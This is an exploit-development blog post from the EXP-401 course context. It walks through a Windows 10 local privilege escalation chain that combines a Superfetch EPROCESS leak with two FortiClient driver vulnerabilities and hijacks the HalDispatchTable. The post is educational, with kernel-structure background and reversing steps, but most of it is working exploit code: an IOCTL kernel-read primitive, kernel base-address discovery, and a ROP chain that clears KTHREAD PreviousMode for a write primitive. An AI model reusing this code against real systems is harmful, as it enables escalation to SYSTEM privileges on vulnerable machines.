Finding A Needle In A KSTACK

I ran in to an issue with triggering a bugcheck AKA the Blue Screen Of Death or BSOD on Windows 10 20H1 while solving an Extra Mile exercise in the EXP-401 course. The challenge was to change the exploit from the course material targeting CVE-2021-1732 from a Data Only attack to Code Execution.

In a Data Only Attack we use the read/write primitives of the exploit to find the SYSTEM process and copy it’s token to our current process thus elevating our process to SYSTEM. This prevents us from having to execute shellcode or dynamic code in the kernel, which would be stopped by Hypervisor-protected Code Integrity (HVCI). HVCI works sort of like Arbitrary Code Guard (ACG) in user-mode, but protects the kernel-mode memory. The gist at a high level is code is immutable, dynamic code is bad and should not run and therefor HVCI makes it impossible to run dynamic code. You can read more about HVCI on the Microsoft site. HVCI HVCI has to be turned off by removing the Hyper-V role and disabling Virtualization Based Security (VBS) in the VM to play around with the kernel-mode code execution challenge. A Windows 10 20H2 VM without HVCI/VBS is used in the demo for this blog.

The task seemed easy enough:

Allocate user-mode memory
Copy token stealing shellcode to the user-mode memory address that I control
Enumerate the Page Table Entry (PTE) for that user-mode memory address I control
Use the read and write primitives to change the User/Supervisor (U/S) bit to S AKA 0
Hijack execution through the HalDispatchTable by replacing HalDispatchTable+0x08 (HaliQuerySystemInformation) with the address of my shellcode
Trigger HalDispatchTable+0x08 from user-mode
Start a command prompt cmd.exe

In reality it was not that simple. I will walk through a similar scenario of solving the HalDispatchTable hijack in this blog with a little Reverse Engineering (RE) and a lot of kernel debugging. I will also switch from the TagWND exploit CVE-2021-1732 to attacking CVE-2021-31955, CVE-2015-4077, and CVE-2015-5736 on Windows 10 20H2 to avoid spoiling the Extra Mile from EXP-401. This attacks the forti shield driver and a native Windows information leak for a full chain. I built this exploit combining two public POCs and making modifications for OS version and to target code execution through the HalDispatchTable. There is also an Extra Mile in EXP-401 2025 course version to solve that same forti shield exploit, but it is on a different version of the OS so my hard coded offsets won’t work and you will BSOD if you just try to run it to solve that one. If you wish to follow along in your own lab you will need a Windows 10 20H2 VM with Fortinet FortiClient 5.2.3 installed. You will also need a VM for kernel debugging with WinDbg.

This blog is intended to be a deeper dive on the HalDispatchTable and issues caused by HVCI and will be lighter on the explanation of the CVEs.

CVE-2021-31955 is a native Windows kernel vulnerability that allows for leaking the EPROCESS address for all processes running on the system. the high level overview is that poor access controls allowed using the SUPERFETCH feature in the NtQuerySystemInformation API in low integrity to query the EPROCESS address of each running process. Microsoft has patched this particular flaw and has implemented additional hardening in the NtQuerySystemInformation API to prevent leaking kernel-mode address in Medium and High integrity levels as well. In Windows 11 24H2 Microsoft implemented the ExIsRestrictedCaller flag that now checks to see if the calling process has the SeDebugPrivelege before returning kernel-mode addresses. A process that does not have the SeDebugPrivilege will received zeroed out or masked kernel-mode pointers and addresses KASLR-Leaks-Restriction. The Kernel Page Table Isolation also prevents dereferencing kernel-mode memory from users-mode requiring you to use a kernel-mode read/write primitive for any leaked addresses to be useful.

freeide’s POC code CVE-2021-31955was used and slightly modified to work in this exploit. The main changes were adding a target process name parameter to the GetEprocessAddress() function, modifying the for loops to find the target process and only print it’s EPROCESS instead of all running processes, and returning the target process EPROCESS address as a ULONGLONG instead of returning void. A walkEprocess() function was also added to return the KTHREAD from passing in the EPROCESS. You will notice variations in naming conventions for functions and variables in this POC. This is because I’m lazy and felt it too tedious to modify the combined POCs into a single consistent naming convention. I’m ok with you judging me for that.

ULONGLONG GetEprocessAddress(const char* target)
....

	const char* targetName = target;
	const char* procName;

	for (ULONG i = 0; i < sv3plus_request->InfoCount; ++i)
	{
		procName = (const char*)&sv3plus_request->InfoArrayV3Plus[i].data[0x14];

		if (strcmp(procName, targetName) == 0) {
			//printf("%15s\t%5d\t%p\n", procName, sv3plus_request->InfoArrayV3Plus[i].ProcessId, sv3plus_request->InfoArrayV3Plus[i].EProcess);
			return sv3plus_request->InfoArrayV3Plus[i].EProcess;
		}

...
ULONGLONG walkEprocess(HANDLE driver, ULONGLONG eProcess) {
	DWORD currentTid = GetCurrentThreadId();

	ULONGLONG listHead = eProcess + EPROCESS_ThreadListHead_Offset;
	ULONGLONG flink = leakQWORD(listHead, driver);

	while (flink != listHead) {
		ULONGLONG ethread = flink - ETHREAD_ThreadListEntry_Offset;

		ULONGLONG uniqueTid = leakQWORD(ethread + ETHREAD_Cid_Offset + CLIENTID_UniqueThread_Offset, driver);

		if ((DWORD)uniqueTid == currentTid) {
			ULONGLONG kthread = ethread;  // Tcb is at offset 0x0
			printf("[+] Found current thread:\n");
			printf("[+] ETHREAD: 0x%llx\n", ethread);
			printf("[+] KTHREAD: 0x%llx\n", kthread);
			return kthread;
		}

		flink = leakQWORD(flink, driver);  // Move to next thread
	}

	printf("[-] Current thread not found in EPROCESS thread list.\n");
}

CVE-2015-4077 is a vulnerability in the mdare64_48.sys driver from fortinet that allows reading arbitrary kernel memory. The POC uses the vulnerable Input/Output Control (IOCTL) number to read a specified kernel-mode memory address. This is what gives us the read primitive for our exploit.

Morten Schenk and Sickness’s POC code from exploit-db was used to exploit CVE-2015-4077 in this exploit. The leakNtBase() function required some updates to find the base address of nt. According to wumb0 the .text section of nt was moved from offset 0x1000 in the ntoskrnl.exe to an offset of around 0x2000000. This broke Morten Schenk’s scan back method for finding the MZ header to recover the base address. It is fixable by subtracting a large value first before performing the scan back.

ULONGLONG leakNtBase(HANDLE driver, ULONGLONG kthread)
{

	ULONGLONG ntAddr = leakQWORD(kthread + 0x2a8, driver);
	ULONGLONG baseAddr;
	ULONGLONG signature = 0x00905a4d;
	ULONGLONG searchAddr = (ntAddr-0x300000) & 0xFFFFFFFFFFFFF000;

	while (TRUE)
	{
		ULONGLONG readData = leakQWORD(searchAddr, driver);
		ULONGLONG tmp = readData & 0xFFFFFFFF;
		
		//printf("%llx\n", readData);
		//printf("%llx\n", tmp);
		

		if (tmp == signature)
		{
			baseAddr = searchAddr;
			break;
		}
		searchAddr = searchAddr - 0x1000;
	}
	return baseAddr;
}

CVE-2015-5736 is a vulnerability in the fortishield.sys driver from fortinet that allows for arbitrary code execution in the kernel by allowing the user to set the call back function from user-mode. We use this vulnerable IOCTL to set a callback to a ROP chain that will clear the Previous Mode bit on our KTHREAD allowing us to create a kernel-mode write primitive. The easier version of this exploit would then allocate user-mode memory containing token stealing shellcode, flip the U/S bit on the PTE, and then utilize the vulnerable IOCTL again setting the callback function to our user-mode address containing our shellcode. We are going a slightly harder route and using the write primitive to hijack execution from the HalDispatchTable to allow us the chance to bypass another mitigation.

Morten Schenk and Sickness’s POC from exploit-db was also used to exploit CVE-2015-5736 in this exploit. The major changes were updating the ROP chain to work with Windows 10 20H2 and modifying it to use the HalDispatchTable for the shellcode execution instead of incorporating the shellcode execution in to the ROP chain or calling the vulnerable IOCTL a second time to execute the shellcode.

PULONGLONG allocate_fake_stack(ULONGLONG ntBase, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG kThread)
{
	PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000B60E0000, 0x14000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (fake_stack == NULL)
	{
		printf("[!] Error while allocating the fake stack: %d\n", GetLastError());
		exit(1);
	}
	memset(fake_stack, 0x90, 0x14000);

	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x00))[0] = (ULONGLONG)ntBase + 0x3f01bf;		// pop rax ; pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x08))[0] = (ULONGLONG)fortishield_callback;		// Callback address
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x10))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x18))[0] = (ULONGLONG)ntBase + 0x2dd014;		// mov qword [rax], rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x20))[0] = (ULONGLONG)ntBase + 0x3f01bf;		// pop rax ; pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x28))[0] = (ULONGLONG)kThread + 0x232;			// KTHREAD.PreviousMode
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x30))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x38))[0] = (ULONGLONG)ntBase + 0x49584f;		// mov byte [rax], cl ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x40))[0] = (ULONGLONG)ntBase + 0x2017d0;		// pop rbx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x48))[0] = 0x00000000b60f0110;					// Location on fake_stack
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x50))[0] = (ULONGLONG)ntBase + 0x2017f2;		// pop rax ; ret;
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x58))[0] = (ULONGLONG)ntBase + 0x217527;		// mov rax, rcx ; add rsp, 0x28 ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x60))[0] = (ULONGLONG)ntBase + 0x3cd671;		// mov rcx, rsi ; call rax
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x68))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x70))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x78))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x80))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x88))[0] = (ULONGLONG)ntBase + 0x20de71;		// pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x90))[0] = 0x0000000000000028;					// Value to subtract to get RSP
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x98))[0] = (ULONGLONG)ntBase + 0x029db2b;		// sub rax, rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xa0))[0] = (ULONGLONG)ntBase + 0x20de71;		// pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xa8))[0] = (ULONGLONG)fortishield_restore;		// Restore address
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xb0))[0] = (ULONGLONG)ntBase + 0x2dd014;		// mov qword [rax], rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xb8))[0] = (ULONGLONG)ntBase + 0x2b82ce;		// mov qword [rbx], rax ; add rsp, 0x20 ; pop rbx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xc0))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xc8))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xd0))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xd8))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xe0))[0] = 0x0000000000000000;					// Restore RBX
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xe8))[0] = (ULONGLONG)ntBase + 0x201380;		// pop rsp ; ret
	return fake_stack;
}

The full exploit code can be found in my GitHub repo forti_shield

A quick side quest is necessary to discuss some important structures used by the Windows kernel. Processes are a management and control construct used by Windows to control resources and scheduling of code execution. Process do not execute code themselves. Processes contain threads, and sometimes fibers, that execute the code. Running process have an EPROCESS, KPROCESS, ETHREAD, and KTHREAD structure.

The EPROCESS structure is the virtual representation of the process in the Executive’s portion of the Windows kernel. This structure contains process identity and basic metadata including the UniqueProcessId (Process Identifier PID), ImageFileName (name of the executable), InheritedFromUniqueProcessId (parent PID). EPROCESS also contains the Flags field that lists the process state, protection flags, and job associations. It ties together the thread, memory management, and security information of the process. It contains the ActiveProcessLinks which is a doubly linked list chaining all running processes together. This is an important piece to remember as part of our Privilege Escalation is walking the ActiveProcessLinks to find the SYSTEM process, (PID) 4. The other important piece to remember for Privilege Escalation is that the EPROCESS also contains the Security Token. The Security Token is the identifier that ties the process to the privileges it has. So if we copy the SYSTEM process token to our current processes Security Token in it’s EPROCESS structure then our process will have the same privileges as the SYSTEM process. the integrity levels, or trust/permissions levels, for a process are low (low privileged/sandboxed user), medium (normal user), high (administrator), and SYSTEM (Full Control). The EPROCESS also contains a pointer to the Process Environment Block (PEB) which contains the environment information for the process that is accessible via user-mode.

The KPROCESS structure is embedded in the EPROCESS structure. This structure is the virtual representation of the process object for the kernel. It holds the lower level details and management of the process including scheduling, dispatcher info, ready queues, affinity, and priority for the process. It is basically all of the scheduling information for the process to schedule the threads for execution. KPROCESS also tracks context switching between threads. We use this feature in kernel debugging when we switch to the context of our process and interact with the process’s Executive Thread.

The ETHREAD represents the thread for the process for the Executive portion of the Windows Kernel. This will contain high level thread specific information such as ThreadListEntry (Link back to EPROCESS), ThreadPriority, and Client_id (Cid). the Cid is a structure containing the UniqueProcess Id (PID) and the UniqueThread Id (TID) making it possible to link the thread and process together when trying to walk fro EPROCESS down to the KTHREAD to verify you have the right process/thread combination when walking the linked lists which you will see later in the walkEprocess function of the POC. The ETHREAD has the KTHREAD embedded making it possible to also walk back to the EPROCESS if you have the KTHREAD address using the Cid and ThreadListEntry. It also contains a pointer to the Thread Environment Block (TEB) that contains the thread’s environment information that is accessible from user-mode. In user-mode if you needed to find the stack limit and stack base for the thread you would pull it from the TEB.

The KTHREAD is embedded in the ETHREAD. This is the representation of the thread for the process in the kernel portion of the Windows Kernel. It holds stack information, dispatcher state, wait blocks, and the TrapFrame. The TrapFrame references stored CPU registers on the stack to restore when the thread resumes execution. It is important to remember that while to our perception threads run continuously, that is not the case in reality. The threads are actually only allowed to run for very brief intervals on the CPU and then go to a wait state until it’s their turn to run again. Thus the CPU register values need to be stored somewhere to restore the state and continue execution. The KTHREAD is also where we can find the PreviousMode bit. It used to be possible to create a read/write primitive by clearing the PreviousMode bit. Windows would check this bit to determine if parameters passed to the Windows 32 APIs or functions where sent from kernel-mode or user-mode. So if it was cleared to zero you could call ReadProcessMemory and NtWriteVirtualMemory to read or write kernel-mode memory from user-mode as the kernel would think that it came from a kernel-mode call instead of a user-mode call. This method is no longer possible, but is the method used in this example.

post2-windbg-kthread

I started solving the kernel code execution piece by looking at examples of how other people have used the HalDispatchTable method (and also ensuring HVCI and VBS were disabled on the VM). Connor McGarr wrote a nice blog on exploiting Hacksys Extreme Vulnerable Driver (HEVD) in 32-bit where he used it to call his shellcode stored in a user-mode memory location. If you can understand 32-bit then you can typically easily pivot to 64-bit Kernel-Exploitation-2 Connor McGarr

I will do the quick dive through the 64-bit version here.

If we open up ntoskrnl.exe in IDA and search for HalDisptachTable we will find one hit.

post2-ida-haldispatch-table1

Double click on it to see the table and look for HalDispatchTable+0x08

post2-ida-haldispatch-table2 Here it is labeled as xHalSetSystemInformation, which is weird because we know at run time it is set to nt!HaliQuerySystemInformation. This is because the HalDispatchTable is built at runtime when the OS boots. xHalSetSystemInformation is an internal wrapper/thunk function that sit between ntoskrnl and the Hardware Abstraction Layer (HAL) implementation. The exported symbol name at runtime varies based off of factors such as ACPI HAL vs APIC HAL, Hypervisor presence, secure kernel state, and build version. the exported symbol name will stay consistent across boots of your lab VM though. We can verify the exported symbol name at runtime in WinDbg with:

 dqs nt!HalDispatchTable

post2-windbg-haldispatchtable-1

Our goal is to figure out how to reach this entry in the dispatch table. If we cross reference the label off__140C00A68 in IDA by highlighting it and hitting ctrl+J or right clicking and selecting ‘list cross references to’ we will see KeQueryIntervalProfile in the list. Ke and Ki designate functions as kernel functions in Microsoft nameology. We will investigate this function as it looks interesting being a kernel function. If this was brand new to us and we were trying to find the unknown path we would likely have to investigate many of the options until we find something that works.

post2-ida-kequeryintervalprofile-1

When we double click the entry for KeQueryIntervalProfile we will jump to the function in IDA. It’s important to note here that we see a call to guard_dispatch_icall which is a Kernel Control Flow Guard (KCFG) function.

post2-ida-kequeryintervalprofile-2

Now if we right click KeQueryIntervalProfile at the top of the graph and select “List cross reference to…” or hit ctrl+X we can see a reference in NtQueryIntervalProfile.

post2-ida-kequeryintervalprofile-3

As we double click and enter the NtQueryIntervalProfile function we see in the function’s prologue a “mov rax, gs:188h” followed by “mov dil, [rax+232h]” and “test dil, dil”. This loads the KTHREAD of the calling thread into rax and then extracts the PreviousMode and checks to see if it is 0 or kernel-mode. The PreviousMode tells the kernel if the thread is calling from kernel-mode or user-mode. This indicates that this function is most likely called via a syscall since it is checking to make sure the context has been switch to kernel-mode and mirrors the typical prologue of a function called via a syscall.

post2-windbg-previousmode-1

post2-windbg-previousmode-2

We will now jump over to ntdll.dll for further analysis. When we open up ntdll.dll in IDA and check the exports we find an NtQueryIntervalProfile function within ntdll as well.

post2-ida-ntqueryintervalprofile-2

When we double click on the function to jump to the disassembly graph we see a short function that makes a 0x151 syscall.

post2-ida-ntqueryintervalprofile-3

We can then switch back to WinDbg and verify that syscall 0x151 calls to nt!NtQueryIntervalProfile. We consult the KiServiceTable which is a table of offsets in to ntoskrnl and the syscall number is the index in to the KiServiceTable to find the offset of the desired function. We then take the value found and the index and right shift it 4 bits. We then add that to nt!KiServiceTable and disassemble at that address. We use the following commands to verify the syscall:

dd nt!KiServiceTable + 0x04 * 0x151 L1

? 064FCD00 >>> 4

u nt!KiServiceTable + 00000000`0064fcd0

post2-windbg-syscall-1

We can call this function from user-mode since it is exported from ntdll.dll if we know the function prototype and its parameters. However, this is an undocumented API and Microsoft does not intended for us to directly call it, meaning they do not provide us with the function prototype or an example of how to call it. Luckily other researchers have performed the RE necessary to determine the function prototype so that we know how to call it. NtDoc lists the prototype as:

#ifndef _NTEXAPI_H
#if (PHNT_MODE != PHNT_MODE_KERNEL)

/**
 * The NtQueryIntervalProfile routine retrieves the interval for the specified profile source.
 *
 * \param ProfileSource The profile source (KPROFILE_SOURCE) to query.
 * \param Interval A pointer to a variable that receives the interval, in 100-nanosecond units.
 * \return NTSTATUS Successful or errant status.
 */
NTSYSCALLAPI
NTSTATUS
NTAPI
NtQueryIntervalProfile(
    _In_ KPROFILE_SOURCE ProfileSource,
    _Out_ PULONG Interval
    );

#endif
#endif

Connor McGarr was able to use 0x1234 for ProfileSource in his blog. I did not have any luck getting that to work in my initial testing. This was likely due to other errors in the code because it now works if I use that in my final POC. I used the value 0x2 that corresponds to ProfileTotalIssues during my troubleshooting when I finally got the code to work. I picked this value based off a recommendation from Microsoft CoPilot when troubleshooting errors as it said it was the most commonly used value. AI can help you if used properly, but you cannot be successful in the security research or exploit development fields if you over rely on AI. My testing showed that the value 0x2 worked so I kept that value as using legitimate values blend in a bit better than random values that do not conform what a normal call looks like. The Interval parameter can simply be a pointer to a declared ULONG variable. Below is the enum of the KPROFILE_SOURCE from NtDoc

#ifndef _NTKEAPI_H
#if (PHNT_MODE != PHNT_MODE_KERNEL)

typedef enum _KPROFILE_SOURCE
{
    ProfileTime,
    ProfileAlignmentFixup,
    ProfileTotalIssues,
    ProfilePipelineDry,
    ProfileLoadInstructions,
    ProfilePipelineFrozen,
    ProfileBranchInstructions,
    ProfileTotalNonissues,
    ProfileDcacheMisses,
    ProfileIcacheMisses,
    ProfileCacheMisses,
    ProfileBranchMispredictions,
    ProfileStoreInstructions,
    ProfileFpInstructions,
    ProfileIntegerInstructions,
    Profile2Issue,
    Profile3Issue,
    Profile4Issue,
    ProfileSpecialInstructions,
    ProfileTotalCycles,
    ProfileIcacheIssues,
    ProfileDcacheAccesses,
    ProfileMemoryBarrierCycles,
    ProfileLoadLinkedIssues,
    ProfileMaximum
} KPROFILE_SOURCE;

#endif
#endif

We now have enough to start putting together a full chain exploit using the HalDispatchTable for kernel-mode code execution. The code for the executable that will result in a bugcheck is in the GitHub repo as bugcheck.cpp and listed below in chunks with explanations. You will still need the solution from the repo that includes the headers and libraries needed to compile.

This first chunk just includes the headers, defines some constants, imports the token stealing shellcode from token_stealing.asm to TokenStealing(). The constants are for values in the EPROCESS and ETHREAD structures to find the KTHREAD from the EPROCESS. These are hardcoded so they are not guaranteed to work on other versions of Windows since they can change. It has been tested to work on Windows 10 20H1 and 20H2. We also define the prototpye for NtQueryIntervalProfile at the end of this chunk.

#include "stdafx.h"
#include <windows.h>
#include "ntos.h"
#include <stdio.h>
#include <stdlib.h>
#include <Psapi.h>
#include <Shlobj.h>

#pragma comment (lib,"psapi")
#pragma comment(lib, "ntdll_x64.lib")
#define EPROCESS_ThreadListHead_Offset 0x5e0
#define ETHREAD_ThreadListEntry_Offset 0x4e8
#define ETHREAD_Tcb_Offset             0x000
#define ETHREAD_Cid_Offset             0x478
#define CLIENTID_UniqueThread_Offset   0x8

extern "C" void TokenStealing();

typedef enum _SUPERFETCH_INFORMATION_CLASS
{
	SuperfetchRetrieveTrace = 0x1,
	SuperfetchSystemParameters = 0x2,
	SuperfetchLogEvent = 0x3,
	SuperfetchGenerateTrace = 0x4,
	SuperfetchPrefetch = 0x5,
	SuperfetchPfnQuery = 0x6,
	SuperfetchPfnSetPriority = 0x7,
	SuperfetchPrivSourceQuery = 0x8,
	SuperfetchSequenceNumberQuery = 0x9,
	SuperfetchScenarioPhase = 0xA,
	SuperfetchWorkerPriority = 0xB,
	SuperfetchScenarioQuery = 0xC,
	SuperfetchScenarioPrefetch = 0xD,
	SuperfetchRobustnessControl = 0xE,
	SuperfetchTimeControl = 0xF,
	SuperfetchMemoryListQuery = 0x10,
	SuperfetchMemoryRangesQuery = 0x11,
	SuperfetchTracingControl = 0x12,
	SuperfetchTrimWhileAgingControl = 0x13,
	SuperfetchInformationMax = 0x14,
} SUPERFETCH_INFORMATION_CLASS;
typedef NTSTATUS(WINAPI* _NtWriteVirtualMemory)(
	_In_ HANDLE ProcessHandle,
	_In_ PVOID BaseAddress,
	_In_ PVOID Buffer,
	_In_ ULONG NumberOfBytesToWrite,
	_Out_opt_ PULONG NumberOfBytesWritten
	);

typedef struct _SUPERFETCH_INFORMATION
{
	ULONG Version;
	ULONG Magic;
	SUPERFETCH_INFORMATION_CLASS InfoClass;
	PVOID Data;
	ULONG Length;
} SUPERFETCH_INFORMATION, * PSUPERFETCH_INFORMATION;

typedef enum _PFS_PRIVATE_PAGE_SOURCE_TYPE {
	PfsPrivateSourceKernel = 0x0,
	PfsPrivateSourceSession = 0x1,
	PfsPrivateSourceProcess = 0x2,
	PrfsPrivateSourceMax = 0x3,
} PFS_PRIVATE_PAGE_SOURCE_TYPE;

#pragma pack(push)
#pragma pack(4)

typedef struct _PFS_PRIVATE_PAGE_SOURCE
{
	PFS_PRIVATE_PAGE_SOURCE_TYPE Type;
	union {
		DWORD SessionId;
		DWORD ProcessId;
	};
	DWORD SpareDwords[2];
	ULONG ImagePathHash;
	ULONG UniqueProcessHash;
} PFS_PRIVATE_PAGE_SOURCE, * PPFS_PRIVATE_PAGE_SOURCE;

typedef struct _PF_PRIVSOURCE_INFO_V3 {
	PFS_PRIVATE_PAGE_SOURCE DbInfo;
	union {
		ULONG_PTR EProcess;
		ULONG_PTR GlobalVA;
	};
	ULONG WsPrivatePages;
	ULONG TotalPrivatePages;
	ULONG SessionID;
	CHAR ImageName[16];
	BYTE SpareBytes[12];
} PF_PRIVSOURCE_INFO_V3, * PPF_PRIVSOURCE_INFO_V3;

typedef struct _PF_PRIVSOURCE_INFO_V3PLUS {
	BYTE data2[8];
	DWORD ProcessId;
	BYTE data3[16];
	ULONG_PTR EProcess;
	BYTE data[60];
} PF_PRIVSOURCE_INFO_V3PLUS, * PPF_PRIVSOURCE_INFO_V3PLUS;

typedef struct _PF_PRIVSOURCE_QUERY_REQUEST {
	ULONG Version;

	union {
		__declspec(align(4)) struct {
			ULONG InfoCount;
			PF_PRIVSOURCE_INFO_V3 InfoArrayV3[1];
		} __sv3;
		__declspec(align(4)) struct {
			ULONG Type;
			ULONG InfoCount;
			PF_PRIVSOURCE_INFO_V3PLUS InfoArrayV3Plus[1];
		} __sv3plus;
	} __u0;
} PF_PRIVSOURCE_QUERY_REQUEST, * PPF_PRIVSOURCE_QUERY_REQUEST;

#pragma pack(pop)

typedef NTSTATUS(WINAPI* _NtQueryIntervalProfile)(
	DWORD junk,
	PULONG buffer
	);

This chunk defines the GetEprocessAddress() from freeide’s code for CVE-2021-31955 with my modifications mentioned earlier.

ULONGLONG GetEprocessAddress(const char* target)
{
	ULONG superfetch_info_size;
	PF_PRIVSOURCE_QUERY_REQUEST* pf_privsource_query_request;
	SUPERFETCH_INFORMATION superfetch_info = { 0 };
	BYTE temp_buffer[0x70];

	ZeroMemory(temp_buffer, sizeof(temp_buffer));

	PPEB peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
	DWORD dwBuildNumber = peb->OSBuildNumber;

	*(DWORD*)temp_buffer = 8; // Windows 10

	switch (dwBuildNumber)
	{
	case 7600:
	case 7601:
		*(DWORD*)temp_buffer = 3;
		break;
	case 9200:
		*(DWORD*)temp_buffer = 5;
		break;
	case 9600:
		*(DWORD*)temp_buffer = 6;
		break;
	}
	*(DWORD*)&temp_buffer[4] = 0;

	superfetch_info.InfoClass = SuperfetchPrivSourceQuery;
	superfetch_info.Version = 45;
	superfetch_info.Magic = 'kuhC';
	superfetch_info.Data = temp_buffer;
	superfetch_info.Length = sizeof(temp_buffer);

	NTSTATUS status;
	ULONG pf_privsource_query_request_version = *(DWORD*)temp_buffer;

	status = NtQuerySystemInformation(SystemSuperfetchInformation, &superfetch_info, sizeof(SUPERFETCH_INFORMATION), &superfetch_info_size);

	pf_privsource_query_request = (PF_PRIVSOURCE_QUERY_REQUEST*)LocalAlloc(LPTR, 2 * superfetch_info_size);

	pf_privsource_query_request->__u0.__sv3.InfoCount = 0;
	pf_privsource_query_request->Version = pf_privsource_query_request_version;
	superfetch_info.Data = pf_privsource_query_request;
	superfetch_info.Length = 2 * superfetch_info_size;

	status = NtQuerySystemInformation(SystemSuperfetchInformation, &superfetch_info, sizeof(SUPERFETCH_INFORMATION), &superfetch_info_size);

	auto sv3plus_request = &pf_privsource_query_request->__u0.__sv3plus;
	const char* targetName = target;
	const char* procName;

	for (ULONG i = 0; i < sv3plus_request->InfoCount; ++i)
	{
		procName = (const char*)&sv3plus_request->InfoArrayV3Plus[i].data[0x14];

		if (strcmp(procName, targetName) == 0) {
			//printf("%15s\t%5d\t%p\n", procName, sv3plus_request->InfoArrayV3Plus[i].ProcessId, sv3plus_request->InfoArrayV3Plus[i].EProcess);
			return sv3plus_request->InfoArrayV3Plus[i].EProcess;
		}


	}

	LocalFree(pf_privsource_query_request);
}

This chunk performs the address leak from CVE-2015-4077 via the leakQWORD() function. This function takes the address you want to read and the handle to the madre driver. It includes the modified leakNtBase() function to find the base address of nt by supplying the handle to the mdare driver and the nt address we pull from our KTHREAD. This uses Morten Schenk’s method of reading the address at KTHREAD + 0x2a8 which contains the address to nt!EmpCheckErrataList. It then uses the modified scan back technique to locate the nt base address. The leakFortiBase() function is used to leak the base address of Fortishield. It uses the PsLoadModuleList in nt to search through the list and find the module that matches the handle for our fortishield driver.

PULONGLONG leak_buffer = (PULONGLONG)VirtualAlloc((LPVOID)0x000000001a000000, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
ULONGLONG leakQWORD(ULONGLONG addr, HANDLE driver)
{
	memset((LPVOID)0x000000001a000000, 0x11, 0x1000);
	memset((LPVOID)0x000000001a001000, 0x22, 0x1000);
	leak_buffer[0] = 0x000000001a000008;
	leak_buffer[1] = 0x0000000000000003;
	leak_buffer[4] = 0x000000001a000028;
	leak_buffer[6] = addr - 0x70;

	DWORD IoControlCode = 0x22608C;
	LPVOID InputBuffer = (LPVOID)0x000000001a000000;
	DWORD InputBufferLength = 0x20;
	LPVOID OutputBuffer = (LPVOID)0x000000001a001000;
	DWORD OutputBufferLength = 0x110;
	DWORD lpBytesReturned;

	BOOL triggerIOCTL;
	triggerIOCTL = DeviceIoControl(driver, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
	if (!triggerIOCTL)
	{
		//printf("[!] Error in the SYSCALL: %d\n", GetLastError());
	}

	ULONGLONG result = leak_buffer[0x202];
	return result;
}

ULONGLONG leakNtBase(HANDLE driver, ULONGLONG kthread)
{

	ULONGLONG ntAddr = leakQWORD(kthread + 0x2a8, driver);
	ULONGLONG baseAddr;
	ULONGLONG signature = 0x00905a4d;
	ULONGLONG searchAddr = (ntAddr - 0x300000) & 0xFFFFFFFFFFFFF000;

	while (TRUE)
	{
		ULONGLONG readData = leakQWORD(searchAddr, driver);
		ULONGLONG tmp = readData & 0xFFFFFFFF;

		//printf("%llx\n", readData);
		//printf("%llx\n", tmp);


		if (tmp == signature)
		{
			baseAddr = searchAddr;
			break;
		}
		searchAddr = searchAddr - 0x1000;
	}
	return baseAddr;
}

ULONGLONG leakFortiBase(HANDLE driver, ULONGLONG ntBase)
{
	ULONGLONG PsLoadModuleListAddr = ntBase + 0xc2a310;
	ULONGLONG searchAddr = leakQWORD(PsLoadModuleListAddr, driver);
	ULONGLONG addr = 0;
	while (1)
	{
		ULONGLONG namePointer = leakQWORD(searchAddr + 0x60, driver);
		ULONGLONG name = leakQWORD(namePointer, driver);
		if (name == 0x00740072006f0046)
		{
			name = leakQWORD(namePointer + 8, driver);
			if (name == 0x0069006800530069)
			{
				addr = leakQWORD(searchAddr + 0x30, driver);
				break;
			}
		}
		searchAddr = leakQWORD(searchAddr, driver);
	}
	return addr;
}

